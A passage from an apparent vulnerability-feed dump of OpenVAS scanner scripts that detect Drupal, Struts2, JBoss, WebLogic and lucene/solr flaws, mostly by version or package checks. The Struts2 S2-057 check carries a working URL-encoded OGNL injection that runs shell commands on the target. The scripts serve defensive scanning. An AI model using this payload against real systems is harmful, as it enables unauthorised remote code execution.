(SA-CORE-2018-004) (Windows, Version Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141029\");\n script_version(\"$Revision: 12012 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-26 08:47:32 +0700 (Thu, 26 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-7602\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Drupal is prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists within multiple subsystems of\n Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which\n could result in the site being compromised. This vulnerability is related to SA-CORE-2018-002 (CVE-2018-7600).\");\n\n script_tag(name:\"affected\", value:\"Drupal 7.x and 8.x\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.59, 8.4.8, 8.5.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-004\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE)) {\n exit(0);\n}\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, version_regex:\"^[0-9]\\.[0-9.]+\", exit_no_version: TRUE)) {\n exit(0);\n}\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0\", test_version2: \"7.58\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.59\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0\", test_version2: \"8.4.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.4.8\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5\", test_version2: \"8.5.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.3\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T10:31:11", "description": "This host is running Apache Struts and is prone to a remote code execution\nvulnerability.", "cvss3": {}, "published": "2018-08-27T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310141398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141398", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141398\");\n script_version(\"2020-05-05T10:19:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 10:19:36 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-27 13:07:39 +0700 (Mon, 27 Aug 2018)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP GET request.\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is prone to a remote code execution\nvulnerability.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions when namespace value isn't set for\na result defined in underlying configurations and in same time, its upper action(s) configurations have no or\nwildcard namespace. Same possibility when using url tag which doesn't have value and action set and in same time,\nits upper action(s) configurations have no or wildcard namespace.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later.\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default: 80);\nhost = http_host_name(dont_add_port: TRUE);\n\nurls = make_list();\n\nexts = http_get_kb_file_extensions(port: port, host: host, ext: \"action\");\nif (exts && is_array(exts))\n urls = make_list(urls, exts);\n\ncmds = exploit_commands();\n\nforeach url (urls) {\n path = eregmatch(pattern: \"(.*/)([^.]+\\.action)\", string: url);\n if (isnull(path[2]))\n continue;\n\n action = path[2];\n dir = path[1];\n\n foreach cmd (keys(cmds)) {\n url_check = dir + \"%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.\" +\n \"%28%23cmd%3D%27\" + cmds[cmd] + \"%27%29.%28%23iswin%3D%28%40\" +\n \"java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27\" +\n \"win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B\" +\n \"%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder\" +\n \"%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start\" +\n \"%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse\" +\n \"%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy\" +\n \"%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/\" + action;\n\n if (http_vuln_check(port: port, url: url_check, pattern: cmd, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url_check);\n security_message(port: port, data: report);\n exit(0);\n }\n }\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:34", "description": "Drupal is prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310141028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141028", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-004_lin.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141028\");\n script_version(\"$Revision: 12012 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-26 08:47:32 +0700 (Thu, 26 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-7602\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Drupal is prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists within multiple subsystems of\n Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which\n could result in the site being compromised. This vulnerability is related to SA-CORE-2018-002 (CVE-2018-7600).\");\n\n script_tag(name:\"affected\", value:\"Drupal 7.x and 8.x\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.59, 8.4.8, 8.5.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-004\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE)) {\n exit(0);\n}\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, version_regex:\"^[0-9]\\.[0-9.]+\", exit_no_version: TRUE)) {\n exit(0);\n}\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0\", test_version2: \"7.58\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.59\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0\", test_version2: \"8.4.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.4.8\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5\", test_version2: \"8.5.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.3\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-12T17:33:15", "description": "JBoss Enterprise Application Platform is prone to multiple\n vulnerabilities, including an information-disclosure issue and\n multiple authentication-bypass issues.", "cvss3": {}, "published": "2010-04-28T00:00:00", "type": "openvas", "title": "JBoss Enterprise Application Platform Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1429", "CVE-2010-1428", "CVE-2010-0738"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310100610", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100610", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# JBoss Enterprise Application Platform Multiple Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100610\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-04-28 14:05:27 +0200 (Wed, 28 Apr 2010)\");\n script_bugtraq_id(39710);\n script_cve_id(\"CVE-2010-0738\", \"CVE-2010-1428\", \"CVE-2010-1429\");\n script_name(\"JBoss Enterprise Application Platform Multiple Vulnerabilities\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_category(ACT_ATTACK);\n script_family(\"Web Servers\");\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_dependencies(\"JBoss_enterprise_aplication_server_detect.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"jboss/detected\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/39710\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit these issues to bypass certain security\n restrictions to obtain sensitive information or gain unauthorized access to the application.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references for details.\");\n\n script_tag(name:\"summary\", value:\"JBoss Enterprise Application Platform is prone to multiple\n vulnerabilities, including an information-disclosure issue and\n multiple authentication-bypass issues.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! port = get_kb_item( \"jboss/port\" ) )\n exit( 0 );\n\nurl = \"/jmx-console\";\nreq = http_get( item:url, port:port );\nbuf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\nif( ! buf || buf =~ \"^HTTP/1\\.[01] [23]00\" )\n exit( 0 );\n\nurl = \"/jmx-console/checkJNDI.jsp\";\nhost = http_host_name( port:port );\n\nreq = string( \"PUT \", url, \" HTTP/1.0\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"\\r\\n\" );\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\nif( res =~ \"^HTTP/1\\.[01] 200\" && \"JNDI Check</title>\" >< res && \"JNDI Checking for host\" >< res ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-29T22:07:15", "description": "Oracle WebLogic Server is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-04-19T00:00:00", "type": "openvas", "title": "Oracle WebLogic Server Multiple Vulnerabilities-01 (cpuapr2017-3236618)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3506", "CVE-2017-5638", "CVE-2016-1181"], "modified": "2020-04-27T00:00:00", "id": "OPENVAS:1361412562310810748", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810748", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle WebLogic Server Multiple Vulnerabilities-01 (cpuapr2017-3236618)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bea:weblogic_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810748\");\n script_version(\"2020-04-27T04:21:52+0000\");\n script_cve_id(\"CVE-2017-5638\", \"CVE-2016-1181\", \"CVE-2017-3506\");\n script_bugtraq_id(96729, 91068, 97884);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 04:21:52 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-04-19 14:58:02 +0530 (Wed, 19 Apr 2017)\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_name(\"Oracle WebLogic Server Multiple Vulnerabilities-01 (cpuapr2017-3236618)\");\n\n script_tag(name:\"summary\", value:\"Oracle WebLogic Server is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaws exist due to some unspecified error in the 'Samples (Struts 2)' and\n 'Web Services' sub-component within Oracle WebLogic Server.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary commands.\");\n\n script_tag(name:\"affected\", value:\"Oracle WebLogic Server versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_oracle_weblogic_consolidation.nasl\");\n script_mandatory_keys(\"oracle/weblogic/detected\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!version = get_app_version(cpe:CPE, nofork:TRUE))\n exit(0);\n\naffected = make_list('10.3.6.0.0', '12.1.3.0.0', '12.2.1.0.0', '12.2.1.2.0', '12.2.1.1.0');\n\nforeach af (affected) {\n if( version == af) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"See advisory\");\n security_message(data:report, port:0);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-29T20:12:14", "description": "Michael Stepankin and Olga Barinova discovered a remote code execution\nvulnerability in Apache Solr by exploiting XML External Entity\nprocessing (XXE) in conjunction with use of a Config API add-listener\ncommand to reach the RunExecutableListener class. To resolve this\nissue the RunExecutableListener class has been removed and resolving\nof external entities in the CoreParser class disallowed.", "cvss3": {}, "published": "2018-01-22T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for lucene-solr (DLA-1254-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12629"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891254", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891254", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891254\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-12629\");\n script_name(\"Debian LTS: Security Advisory for lucene-solr (DLA-1254-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-01-22 00:00:00 +0100 (Mon, 22 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/01/msg00028.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"lucene-solr on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n3.6.0+dfsg-1+deb7u3.\n\nWe recommend that you upgrade your lucene-solr packages.\");\n\n script_tag(name:\"summary\", value:\"Michael Stepankin and Olga Barinova discovered a remote code execution\nvulnerability in Apache Solr by exploiting XML External Entity\nprocessing (XXE) in conjunction with use of a Config API add-listener\ncommand to reach the RunExecutableListener class. To resolve this\nissue the RunExecutableListener class has been removed and resolving\nof external entities in the CoreParser class disallowed.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"liblucene3-contrib-java\", ver:\"3.6.0+dfsg-1+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"liblucene3-java\", ver:\"3.6.0+dfsg-1+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"liblucene3-java-doc\", ver:\"3.6.0+dfsg-1+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libsolr-java\", ver:\"3.6.0+dfsg-1+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"solr-common\", ver:\"3.6.0+dfsg-1+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"solr-jetty\", ver:\"3.6.0+dfsg-1+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"solr-tomcat\", ver:\"3.6.0+dfsg-1+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:47", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-11-02T00:00:00", "type": "openvas", "title": "Fedora Update for lucene FEDORA-2017-005f8f7f7d", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12629"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310873561", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873561", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_005f8f7f7d_lucene_fc25.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for lucene FEDORA-2017-005f8f7f7d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873561\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-02 11:13:52 +0100 (Thu, 02 Nov 2017)\");\n script_cve_id(\"CVE-2017-12629\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for lucene FEDORA-2017-005f8f7f7d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lucene'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"lucene on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-005f8f7f7d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GTE5P6CWLVBPWNLR3RMLZGEFUYCZZR5V\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"lucene\", rpm:\"lucene~5.5.0~5.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 